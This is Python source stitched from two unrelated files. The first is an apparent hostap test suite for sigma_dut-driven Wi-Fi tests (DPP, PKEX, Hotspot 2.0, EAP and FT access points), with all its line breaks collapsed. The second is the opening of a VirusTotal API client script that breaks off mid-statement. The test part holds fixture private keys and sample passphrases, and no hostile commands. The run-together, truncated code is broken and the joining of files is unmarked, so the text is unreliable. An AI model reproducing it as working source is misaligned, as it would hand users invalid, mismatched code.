dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def test_sigma_dut_dpp_proto_responder_pkex(dev, apdev): """sigma_dut DPP protocol testing - Responder (PKEX)""" check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) tests = [("InvalidValue", "PKEXCRResponse", "WrappedData", "BootstrapResult,Errorsent", None), ("MissingAttribute", "PKEXExchangeResponse", "DPPStatus", "BootstrapResult,Errorsent", "No DPP Status attribute"), ("MissingAttribute", "PKEXCRResponse", "BSKey", "BootstrapResult,Errorsent", "No valid peer bootstrapping key found")] for step, frame, attr, result, fail in tests: dev[0].request("FLUSH") dev[1].request("FLUSH") sigma = start_sigma_dut(dev[0].ifname) try: run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr, result, fail) finally: stop_sigma_dut(sigma) def run_sigma_dut_dpp_proto_responder_pkex(dev, step, frame, attr, result, fail): t = threading.Thread(target=dpp_proto_init_pkex, args=(dev[1],)) t.start() res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCode,secret,DPPTimeout,6,DPPStep,%s,DPPFrameType,%s,DPPIEAttribute,%s" % (step, frame, attr), timeout=10) t.join() if result not in res: raise Exception("Unexpected result: " + res) if fail: ev = dev[1].wait_event(["DPP-FAIL"], timeout=5) if ev is None or fail not in ev: raise Exception("Failure not reported correctly:" + str(ev)) dev[1].request("DPP_STOP_LISTEN") dev[0].dump_monitor() dev[1].dump_monitor() def init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev): check_dpp_capab(dev[0]) check_dpp_capab(dev[1]) csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708" ap_connector = 
"eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg" ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b" params = {"ssid": "DPPNET01", "wpa": "2", "ieee80211w": "2", "wpa_key_mgmt": "DPP", "rsn_pairwise": "CCMP", "dpp_connector": ap_connector, "dpp_csign": csign_pub, "dpp_netaccesskey": ap_netaccesskey} try: hapd = hostapd.add_ap(apdev[0], params) except: raise HwsimSkip("DPP not supported") dev[0].set("dpp_config_processing", "2") cmd = "DPP_CONFIGURATOR_ADD key=" + csign res = dev[1].request(cmd) if "FAIL" in res: raise Exception("Failed to add configurator") conf_id = int(res) id0 = dev[1].dpp_bootstrap_gen(chan="81/6", mac=True) uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0) dev[1].set("dpp_configurator_params", " conf=sta-dpp ssid=%s configurator=%d" % (to_hex("DPPNET01"), conf_id)) cmd = "DPP_LISTEN 2437 role=configurator" if "OK" not in dev[1].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri0)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) def test_sigma_dut_dpp_proto_peer_disc_req(dev, apdev): """sigma_dut DPP protocol testing - Peer Discovery Request""" sigma = start_sigma_dut(dev[0].ifname) try: init_sigma_dut_dpp_proto_peer_disc_req(dev, apdev) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes,DPPStep,MissingAttribute,DPPFrameType,PeerDiscoveryRequest,DPPIEAttribute,TransactionID", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,Errorsent" not in res: raise Exception("Unexpected result: " + res) finally: dev[0].set("dpp_config_processing", "0") stop_sigma_dut(sigma) def test_sigma_dut_dpp_self_config(dev, apdev): """sigma_dut DPP Configurator enrolling an AP and using self-configuration""" check_dpp_capab(dev[0]) hapd = hostapd.add_ap(apdev[0], {"ssid": "unconfigured"}) check_dpp_capab(hapd) sigma = start_sigma_dut(dev[0].ifname) try: dev[0].set("dpp_config_processing", "2") id = hapd.dpp_bootstrap_gen(chan="81/1", mac=True) uri = hapd.request("DPP_BOOTSTRAP_GET_URI %d" % id) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPTimeout,6") if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) update_hapd_config(hapd) cmd = 
"dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPCryptoIdentifier,P-256,DPPBS,QR,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPAuthDirection,Single,DPPConfIndex,1,DPPTimeout,6,DPPWaitForConnect,Yes,DPPSelfConfigure,Yes" res = sigma_dut_cmd(cmd, timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) dev[0].set("dpp_config_processing", "0") def test_sigma_dut_ap_dpp_self_config(dev, apdev, params): """sigma_dut DPP AP Configurator using self-configuration""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_self_config.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: run_sigma_dut_ap_dpp_self_config(dev, apdev) finally: stop_sigma_dut(sigma) dev[0].set("dpp_config_processing", "0") def run_sigma_dut_ap_dpp_self_config(dev, apdev): check_dpp_capab(dev[0]) sigma_dut_cmd_check("ap_reset_default,program,DPP") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfEnrolleeRole,AP,DPPBS,QR,DPPConfIndex,1,DPPSelfConfigure,Yes,DPPTimeout,6", timeout=10) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) dev[0].set("dpp_config_processing", "2") id = dev[0].dpp_bootstrap_gen(chan="81/11", mac=True) uri = dev[0].request("DPP_BOOTSTRAP_GET_URI %d" % id) cmd = "DPP_LISTEN 2462 role=enrollee" if "OK" not in dev[0].request(cmd): raise Exception("Failed to start listen operation") res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % to_hex(uri)) if "status,COMPLETE" not in res: raise Exception("dev_exec_action did not succeed: " + res) cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6" res = sigma_dut_cmd(cmd) if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res: raise Exception("Unexpected result: " + res) dev[0].wait_connected() dev[0].request("DISCONNECT") dev[0].wait_disconnected() sigma_dut_cmd_check("ap_reset_default") def test_sigma_dut_preconfigured_profile(dev, apdev): """sigma_dut controlled connection using preconfigured profile""" try: run_sigma_dut_preconfigured_profile(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_preconfigured_profile(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname) params = hostapd.wpa2_params(ssid="test-psk", passphrase="12345678") hapd = hostapd.add_ap(apdev[0], params) dev[0].connect("test-psk", psk="12345678", scan_freq="2412", only_add_network=True) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s" % (ifname, "test-psk")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_wps_pbc(dev, apdev): """sigma_dut and WPS PBC Enrollee""" try: run_sigma_dut_wps_pbc(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_wps_pbc(dev, apdev): ssid = "test-wps-conf" 
hapd = hostapd.add_ap(apdev[0], {"ssid": "wps", "eap_server": "1", "wps_state": "2", "wpa_passphrase": "12345678", "wpa": "2", "wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"}) hapd.request("WPS_PBC") ifname = dev[0].ifname sigma = start_sigma_dut(ifname) cmd = "start_wps_registration,interface,%s" % ifname cmd += ",WpsRole,Enrollee" cmd += ",WpsConfigMethod,PBC" sigma_dut_cmd_check(cmd, timeout=15) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) hapd.disable() sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) dev[0].flush_scan_cache() def test_sigma_dut_sta_scan_bss(dev, apdev): """sigma_dut sta_scan_bss""" hapd = hostapd.add_ap(apdev[0], {"ssid": "test"}) sigma = start_sigma_dut(dev[0].ifname) try: cmd = "sta_scan_bss,Interface,%s,BSSID,%s" % (dev[0].ifname, \ hapd.own_addr()) res = sigma_dut_cmd(cmd, timeout=10) if "ssid,test,bsschannel,1" not in res: raise Exception("Unexpected result: " + res) finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_osen(dev, apdev, params): """sigma_dut controlled AP with OSEN""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_osen.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,OSEN,PMF,Optional") sigma_dut_cmd_check("ap_config_commit,NAME,AP") # RSN-OSEN (for OSU) dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN", pairwise="CCMP", group="GTK_NOT_USED", eap="WFA-UNAUTH-TLS", identity="osen@example.com", ca_cert="auth_serv/ca.pem", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_eap_osen(dev, apdev, params): """sigma_dut controlled AP with EAP+OSEN""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap_osen.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, bridge="ap-br0", hostapd_logdir=logdir) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-hs20,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-OSEN,PMF,Optional") sigma_dut_cmd_check("ap_config_commit,NAME,AP") subprocess.call(['brctl', 'setfd', 'ap-br0', '0']) subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'up']) # RSN-OSEN (for OSU) dev[0].connect("test-hs20", proto="OSEN", key_mgmt="OSEN", pairwise="CCMP", eap="WFA-UNAUTH-TLS", identity="osen@example.com", ca_cert="auth_serv/ca.pem", ieee80211w='2', scan_freq="2412") # RSN-EAP (for data connection) dev[1].connect("test-hs20", key_mgmt="WPA-EAP", eap="TTLS", identity="hs20-test", password="password", ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2", ieee80211w='2', scan_freq="2412") hwsim_utils.test_connectivity(dev[0], dev[1], broadcast=False, success_expected=False, timeout=1) sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) subprocess.call(['ip', 'link', 'set', 'dev', 'ap-br0', 'down'], stderr=open('/dev/null', 'w')) subprocess.call(['brctl', 'delbr', 'ap-br0'], stderr=open('/dev/null', 'w')) def test_sigma_dut_ap_eap(dev, apdev, params): """sigma_dut controlled AP WPA2-Enterprise""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap.sigma-hostapd") with 
HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-eap", key_mgmt="WPA-EAP", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_eap_sha256(dev, apdev, params): """sigma_dut controlled AP WPA2-Enterprise SHA256""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_eap_sha256.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-eap,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-256") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-eap", key_mgmt="WPA-EAP-SHA256", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_ft_eap(dev, apdev, params): """sigma_dut controlled AP FT-EAP""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_eap.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-EAP") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-ft-eap", key_mgmt="FT-EAP", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_ft_psk(dev, apdev, params): """sigma_dut controlled AP FT-PSK""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_ft_psk.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ft-psk,MODE,11ng,DOMAIN,0101,FT_OA,Enable") sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,FT-PSK,PSK,12345678") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-ft-psk", key_mgmt="FT-PSK", psk="12345678", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_ap_ent_ft_eap(dev, apdev, params): """sigma_dut controlled AP WPA-EAP and FT-EAP""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_ent_ft_eap.sigma-hostapd") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,CHANNEL,1,SSID,test-ent-ft-eap,MODE,11ng,DOMAIN,0101,FT_OA,Enable") sigma_dut_cmd_check("ap_set_radius,NAME,AP,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") 
sigma_dut_cmd_check("ap_set_security,NAME,AP,KEYMGNT,WPA2-ENT-FT-EAP") sigma_dut_cmd_check("ap_config_commit,NAME,AP") dev[0].connect("test-ent-ft-eap", key_mgmt="FT-EAP", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") dev[1].connect("test-ent-ft-eap", key_mgmt="WPA-EAP", eap="GPSK", identity="gpsk user", password="abcdefghijklmnop0123456789abcdef", scan_freq="2412") sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma) def test_sigma_dut_venue_url(dev, apdev): """sigma_dut controlled Venue URL fetch""" try: run_sigma_dut_venue_url(dev, apdev) finally: dev[0].set("ignore_old_scan_res", "0") def run_sigma_dut_venue_url(dev, apdev): ifname = dev[0].ifname sigma = start_sigma_dut(ifname, debug=True) ssid = "venue" params = hostapd.wpa2_params(ssid=ssid, passphrase="12345678") params["wpa_key_mgmt"] = "WPA-PSK-SHA256" params["ieee80211w"] = "2" venue_group = 1 venue_type = 13 venue_info = struct.pack('BB', venue_group, venue_type) lang1 = "eng" name1 = "Example venue" lang2 = "fin" name2 = "Esimerkkipaikka" venue1 = struct.pack('B', len(lang1 + name1)) + lang1.encode() + name1.encode() venue2 = struct.pack('B', len(lang2 + name2)) + lang2.encode() + name2.encode() venue_name = binascii.hexlify(venue_info + venue1 + venue2) url1 = "http://example.com/venue" url2 = "https://example.org/venue-info/" params["venue_group"] = str(venue_group) params["venue_type"] = str(venue_type) params["venue_name"] = [lang1 + ":" + name1, lang2 + ":" + name2] params["venue_url"] = ["1:" + url1, "2:" + url2] hapd = hostapd.add_ap(apdev[0], params) sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,PMF" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_set_psk,interface,%s,ssid,%s,passphrase,%s,encpType,aes-ccmp,keymgmttype,wpa2,PMF,Required" % (ifname, "venue", "12345678")) sigma_dut_cmd_check("sta_associate,interface,%s,ssid,%s,channel,1" % (ifname, "venue")) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_hs2_venue_info,interface," + ifname + ",Display,Yes") sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) def test_sigma_dut_hs20_assoc_24(dev, apdev): """sigma_dut controlled Hotspot 2.0 connection (2.4 GHz)""" run_sigma_dut_hs20_assoc(dev, apdev, True) def test_sigma_dut_hs20_assoc_5(dev, apdev): """sigma_dut controlled Hotspot 2.0 connection (5 GHz)""" run_sigma_dut_hs20_assoc(dev, apdev, False) def run_sigma_dut_hs20_assoc(dev, apdev, band24): hapd0 = None hapd1 = None try: bssid0 = apdev[0]['bssid'] params = hs20_ap_params() params['hessid'] = bssid0 hapd0 = hostapd.add_ap(apdev[0], params) bssid1 = apdev[1]['bssid'] params = hs20_ap_params() params['hessid'] = bssid0 params["hw_mode"] = "a" params["channel"] = "36" params["country_code"] = "US" hapd1 = hostapd.add_ap(apdev[1], params) band = "2.4" if band24 else "5" exp_bssid = bssid0 if band24 else bssid1 run_sigma_dut_hs20_assoc_2(dev, apdev, band, exp_bssid) finally: dev[0].request("DISCONNECT") if hapd0: hapd0.request("DISABLE") if hapd1: hapd1.request("DISABLE") subprocess.call(['iw', 'reg', 'set', '00']) dev[0].flush_scan_cache() def run_sigma_dut_hs20_assoc_2(dev, apdev, band, expect_bssid): check_eap_capa(dev[0], "MSCHAPV2") dev[0].flush_scan_cache() ifname = dev[0].ifname sigma = start_sigma_dut(ifname, debug=True) 
sigma_dut_cmd_check("sta_reset_default,interface,%s,prog,HS2-R3" % ifname) sigma_dut_cmd_check("sta_set_ip_config,interface,%s,dhcp,0,ip,127.0.0.11,mask,255.255.255.0" % ifname) sigma_dut_cmd_check("sta_add_credential,interface,%s,type,uname_pwd,realm,example.com,username,hs20-test,password,password" % ifname) res = sigma_dut_cmd_check("sta_hs2_associate,interface,%s,band,%s" % (ifname, band), timeout=15) sigma_dut_wait_connected(ifname) sigma_dut_cmd_check("sta_get_ip_config,interface," + ifname) sigma_dut_cmd_check("sta_disconnect,interface," + ifname) sigma_dut_cmd_check("sta_reset_default,interface," + ifname) stop_sigma_dut(sigma) if "BSSID," + expect_bssid not in res: raise Exception("Unexpected BSSID: " + res) def test_sigma_dut_ap_hs20(dev, apdev, params): """sigma_dut controlled AP with Hotspot 2.0 parameters""" logdir = os.path.join(params['logdir'], "sigma_dut_ap_hs20.sigma-hostapd") conffile = os.path.join(params['logdir'], "sigma_dut_ap_hs20.sigma-conf") with HWSimRadio() as (radio, iface): sigma = start_sigma_dut(iface, hostapd_logdir=logdir, debug=True) try: sigma_dut_cmd_check("ap_reset_default,NAME,AP,program,HS2-R3") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,1,CHANNEL,1,SSID,test-hs20,MODE,11ng") sigma_dut_cmd_check("ap_set_radius,NAME,AP,WLAN_TAG,1,IPADDR,127.0.0.1,PORT,1812,PASSWORD,radius") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,1,KEYMGNT,WPA2-ENT") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,HESSID,02:12:34:56:78:9a,NAI_REALM_LIST,1,OPER_NAME,1") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OSU_SERVER_URI,https://example.com/ https://example.org/,OSU_SSID,test-osu,OSU_METHOD,SOAP SOAP,OSU_PROVIDER_LIST,10,OSU_PROVIDER_NAI_LIST,4") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,NET_AUTH_TYPE,2") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,VENUE_NAME,1") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,DOMAIN_LIST,example.com") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,1,OPERATOR_ICON_METADATA,1") sigma_dut_cmd_check("ap_set_wireless,NAME,AP,WLAN_TAG,2,CHANNEL,1,SSID,test-osu,MODE,11ng") sigma_dut_cmd_check("ap_set_security,NAME,AP,WLAN_TAG,2,KEYMGNT,NONE") sigma_dut_cmd_check("ap_set_hs2,NAME,AP,WLAN_TAG,2,OSU,1") sigma_dut_cmd_check("ap_config_commit,NAME,AP") with open("/tmp/sigma_dut-ap.conf", "rb") as f: with open(conffile, "wb") as f2: f2.write(f.read()) sigma_dut_cmd_check("ap_reset_default") finally: stop_sigma_dut(sigma)
vt.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2011-2019 DoomedRaven.
# This file is part of VirusTotalApi - https://github.com/doomedraven/VirusTotalApi
# See the file 'LICENSE.md' for copying permission.

from __future__ import print_function

# Full VT APIv3 functions added by Andriy Brukhovetskyy
# doomedraven - Twitter : @d00m3dr4v3n
#
# For more information look at:
#
# https://www.virustotal.com/en/documentation/public-api
# https://www.virustotal.com/en/documentation/private-api
# https://www.virustotal.com/intelligence/help/
# https://developers.virustotal.com/v3.0/reference#overview

__author__ = 'Andriy Brukhovetskyy - DoomedRaven'
__version__ = '4.0.0.0a2'
__license__ = 'For fun :)'

import os
import re
import ast
import sys
import csv
import six
import time
import json
import email
import base64
import hashlib
import argparse
import requests
import threading
from glob import glob
from re import match
from collections import deque
from operator import methodcaller
from datetime import datetime
from dateutil.relativedelta import relativedelta
from six.moves.urllib.parse import urlparse

# print mysql style tables
import texttable as tt

# parse OUTLOOK .msg
try:
    from thirdpart.outlook_parser import OUTLOOK
    OUTLOOK_prsr = True
except ImportError:
    OUTLOOK_prsr = False

try:
    import HTMLParser
    HAVE_HTMLPARSER = True
except ImportError:
    HAVE_HTMLPARSER = False

try:
    import urllib3
    urllib3.disable_warnings()
except (AttributeError, ImportError):
    pass

try:
    import pefile
    import peutils
    PEFILE = True
except ImportError:
    PEFILE = False

try:
    import magic
    MAGIC = True
except ImportError:
    MAGIC = False

apikey = ""
req_timeout = 60
re_compile_orig = re.compile

proxies = {}
if os.getenv("PROXY"):
    proxies = {
        "http": os.getenv("PROXY"),
        "https": os.getenv("PROXY")
    }


def is_valid_file(path):
    if os.path.exists(path) and path.endswith(('.yara', '.yar')):
        return path
    else:
        print("The file {fname} does not exist!".format(fname=path))
        return False


def private_api_access_error():
    print('\n[!] 
You don\'t have permission for this operation, Looks like you trying to access to PRIVATE API functions\n') sys.exit() def get_sizes(dictionary): key_s = 20 value_s = 20 key_s = max([len(str(key)) for key in list(dictionary.keys())]) value_s = max([len(str(value)) for value in list(dictionary.values())]) if value_s > 80: value_s = 80 elif value_s < 5: value_s = 5 return key_s, value_s def get_adequate_table_sizes(scans, short=False, short_list=False): av_size_f = 14 result_f = 6 version_f = 9 if scans: # Result len if short: av_size = max([len(engine) if engine is not None and engine in short_list else 0 for engine in scans] ) result = max([len(scans[engine]['result']) if 'result' in scans[engine] and scans[engine]['result'] is not None and engine in short_list else 0 for engine in scans] ) version = max([len(scans[engine]['engine_version']) if 'engine_version' in scans[engine] and scans[engine]['engine_version'] is not None and engine in short_list else 0 for engine in scans] ) else: av_size = max([len(engine) if engine is not None else 0 for engine in scans]) result = max([len(scans[engine]['result']) if 'result' in scans[ engine] and scans[engine]['result'] is not None else 0 for engine in scans] ) version = max([len(scans[engine]['engine_version']) if 'engine_version' in scans[ engine] and scans[engine]['engine_version'] is not None else 0 for engine in scans] ) if result > result_f: result_f = result if av_size > av_size_f: av_size_f = av_size if version > version_f: version_f = version return av_size_f, result_f, version_f def pretty_print(block, headers, sizes=False, align=False, email=False): try: tab = tt.Texttable() if email: tab.set_deco(tt.Texttable.HEADER) if isinstance(block, list): plist = [headers] for line in block: if len(headers) == 1: plist.append([line]) else: plist.append( [line[key] if line.get(key) else ' -- ' for key in headers] ) if len(plist) > 1 and isinstance(plist[0], list): tab.add_rows(plist) else: tab.add_row(plist[0]) else: row = [block[key] if block.get(key) else ' -- ' for key in headers] tab.add_row(row) tab.header(headers) if not align: align = ['l' for key in headers] if sizes: tab.set_cols_width(sizes) tab.set_cols_align(align) print(tab.draw()) except Exception as e: print('Report me plz') print(e) def pretty_print_special(rows, headers, sizes=False, align=False, email=False): try: tab = tt.Texttable() if email: tab.set_deco(tt.Texttable.HEADER) tab.add_rows(rows) if sizes: tab.set_cols_width(sizes) if align: tab.set_cols_align(align) tab.header(headers) print('\n') print(tab.draw()) except Exception as e: print('Report me plz') print(e) def is_file(value): # check if is file and if file is json, avoit recognize input file as dumped json try: if isinstance(value, list): if os.path.isfile(value[0]) and value[0].endswith('.json'): return True, value[0] else: return False, value[0] elif isinstance(value, str): if os.path.isfile(value) and value.endswith('.json'): return True, value else: return False, value except IndexError: print('\n[!] You need to provide some arguments\n') sys.exit() def jsondump(jdata, sha1): jsondumpfile = open('VTDL_{name}.json'.format(name=sha1), 'w') json.dump(jdata, jsondumpfile, indent=4) jsondumpfile.close() print('\n\tJSON Written to File -- VTDL_{sha1}.json\n'.format(sha1=sha1)) def load_file(file_path): if 